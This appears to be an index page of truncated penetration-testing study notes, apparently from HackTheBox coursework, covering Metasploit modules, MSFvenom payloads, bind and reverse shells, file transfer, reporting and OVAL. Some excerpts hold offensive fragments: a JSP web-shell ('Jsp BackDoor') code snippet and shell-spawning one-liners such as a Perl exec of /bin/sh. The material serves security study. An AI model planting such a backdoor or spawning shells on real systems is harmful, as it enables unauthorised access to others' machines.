1. Modules1) Type(1) Auxiliary: Scanning, fuzzing, sniffing, and admin capabilities.(2) Encoders: Ensure that payloads are intact to their destination.(3) Exploits: Defined as modules that exploit a vulnerability that will allow for the payload delivery(4) NOPs: (No Operation code) Keep the payload sizes consistent across exploit attempts.(5) Payloads: Code runs remotely and calls back to the at..
Study Record
1. Discipline1) We will never have enough time to complete the assessment.2) Credibility can be an issue even if we make our tools or manually exploit every service.3) You only have to impress yourself, not the infosec community. As security researchers or penetration testers, we only must validate vulnerabilities, not validate our ego. 2. Metasploit Architecture1) Modulesyeon0815@htb[/htb]$ ls ..
1. Monitoring1) ATT&CK Framework- A globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.[Notable MITRE ATT&CK Tactics and techniques](1) Initial Access(2) Execution- This technique depends on code supplied and planted by an attacker running on the victim host.(3) Command & Control (C2)- The communication channel used by attackers to remotely co..
1. Jsp BackDoor"); out.print(""); out.print(""); out.print(""); out.print("FilePath:"); out.print(""); out.print(""); out.print(""); out.print("GOtoLink"); out.print(""); out.print(""); out.print(""); out.print(""); out.print("");}void mainMenu(JspWriter out,String web_Site)throws Exception{ out.println(""); out.println(""+ico(58)+"FileOperation(File...
1. Spawning Interactive Shells1) /bin/sh -i- This command will execute the shell interpreter specified in the path in interactive mode (-i).2) Perl to Shell- If the programming language Perl is present on the system, these commands will execute the shell interpreter specified.perl —e 'exec "/bin/sh";'perl: exec "/bin/sh";- The command directly above should be run from a script.3) Ruby to Shellru..
1. Crafting Payloads with MSFvenom1) List Payloadsyeon0815@htb[/htb]$ msfvenom -l payloadsFramework Payloads (592 total) [--payload ]================================================== Name Description ---- -----------linux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged..
1. Shell Validation1) psyeon0815@htb[/htb]$ ps PID TTY TIME CMD 4232 pts/1 00:00:00 bash 11435 pts/1 00:00:00 ps2) envyeon0815@htb[/htb]$ envSHELL=/bin/bash 2. Bind Shell- The target system has a listener started and awaits a connection from a pentester's system- Admins typically configure strict incoming firewall rules and NAT on the edge of the network (public-facing), so ..
1. Meow# Telnet# Weak Credentials - Utilized Tools: nmap, telnet 2. Fawn# FTP# Anonymous/Guest Access - Utilized Tools: nmap, ftp 3. Dancing# SMB# Anonymous/Guest Access - Utilized Tools: nmap, smbclient 4. Redeemer# Redis# Vulnerability Assessment# Anonymous/Guest Access - Utilized Tools: nmap, redis-cli 5. Explosion# RDP# Weak Credentials - Utilized Tools: nmap, xfreerdp 6. Preignition# Apache..
1. Protected File Transfers- Data leakage during a penetration test could have severe consequences for the penetration tester, their company, and the client.- It is essential to encrypt highly sensitive data or use encrypted data connections such as SSH, SFTP, and HTTPS. However, sometimes these options are not available to us, and a different approach is required.1) File Encryption on Windows(1..
1. Window File Transfer Methods * Fileless Threats- The term 'fileless' suggests that a threat doesn't come in a file, they use legitimate tools built into a system to execute an attack. This doesn't mean that there's not a file transfer operation. The file is not present on the system but runs in memory. 1) PowerShell Base64 Encode & Decode- If we have access to a terminal, we can encode a file..
1. Reporting- A strong report consists of the following sections:1) Executive Summary- It is intended to be readable by an executive who needs a high-level overview of the details and what is the most important items to fix immediately, depending on the severity.- you can also include a graphical view of the number of vulnerabilities basded on the severity here.2) Overview of Assessment- This se..
1. OVAL (Open Vulnerability Assessment Language - The goal of the OVAL language is to have a three-step structure during the assessment process that consists of:1) Identifying a system's configurations for testing2) Evaluating the current system's state3) Disclosing the information in a report. - The OVAL definitions are recorded in an XML format- The 4 main classes of OVAL definitions consist o..
